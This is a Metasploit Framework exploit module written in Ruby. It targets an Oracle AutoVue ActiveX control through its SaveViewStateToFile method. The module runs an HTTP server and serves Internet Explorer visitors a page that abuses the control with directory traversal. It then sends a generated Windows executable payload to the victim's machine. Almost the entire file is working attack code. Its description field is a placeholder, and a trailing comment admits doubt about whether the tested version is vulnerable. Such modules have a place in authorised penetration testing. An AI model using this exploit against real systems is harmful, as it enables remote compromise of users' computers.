##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Oracle AutoVue 20.0.1 SaveViewStateToFile Vulnerability",
			'Description'    => %q{Module Description},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision$",
			'Author'         =>
				[
					'rgod',    #Initial discovery, poc
					'sinn3r',  #Metasploit
				],
			'References'     =>
				[
					['BID', '50321'],
					['URL', 'http://www.exploit-db.com/exploits/18016/']
				],
			'Payload'        =>
				{
					'BadChars' => "",
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none",
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows', {} ],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Apr 1 2011",
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		#If the client isn't Win / IE, no point to continue
		agent = request.headers['User-Agent']
		if agent !~ /Windows NT \d\.\d/ or agent !~ /MSIE \d\.\d/
			print_error("Target not supported: #{agent.to_s}")
			send_not_found(cli)
			return
		end

		print_status(request.uri)

		# Send our payload if requested
		if request.uri =~ /MicroStation\.dgn/
			return if ((p = regenerate_payload(cli)) == nil)
			exe = generate_payload_exe({ :code => p.encoded })
			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
			send_response(cli, exe, {'Content-Type' => 'application/octet-stream'})
			return
		end

		# Get our server's IP
		if datastore['SRVHOST'] == '0.0.0.0'
			host_ip = Rex::Socket.source_address(cli.peerhost)
		else
			host_ip = datastore['SRVHOST']
		end

		# Server's endpoint
		host = host_ip + ":" + datastore['SRVPORT']

		src_path = "http://#{host}#{get_resource()}/MicroStation.dgn"

		js = <<-JS
		obj.SRC = "#{src_path}";
		obj.RestoreViewStateFromFile("http://#{host}#{get_resource()}/sample.dmp");
		for (i=0; i<6666; i++) {
			try {
				obj.SaveViewStateToFile("../../../../../../../../../../boot.ini");
			}
			catch(e) {
			}
		}
		JS

		html = <<-HTML
		<html>
		<object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' width=640 height=480 />
		</object>
		<script defer=defer>
		#{js}
		</script>
		</html>
		HTML

		print_status("Sending HTML to: #{cli.peerhost}:#{cli.peerport}...")
		send_response(cli, html, {'Content-Type' => 'text/html'})
	end

	def exploit
		@payload_name = rand_text_alpha(5) + ".dgn"
		super
	end
end

=begin
Testing version:
Oracle AutoVue Electro-Mechanical Professional 20.0.2 Desktop Version
Build 790: 2011-08-29

Not vulnerable?
MD5 (AutoVueX.ocx) = eb32aa5068b843f8ebb4d4b83eb5e5ab
SHA1(AutoVueX.ocx)= dce6f88870c8fe1ff7c50db50d4a3db4947cbdd4
=end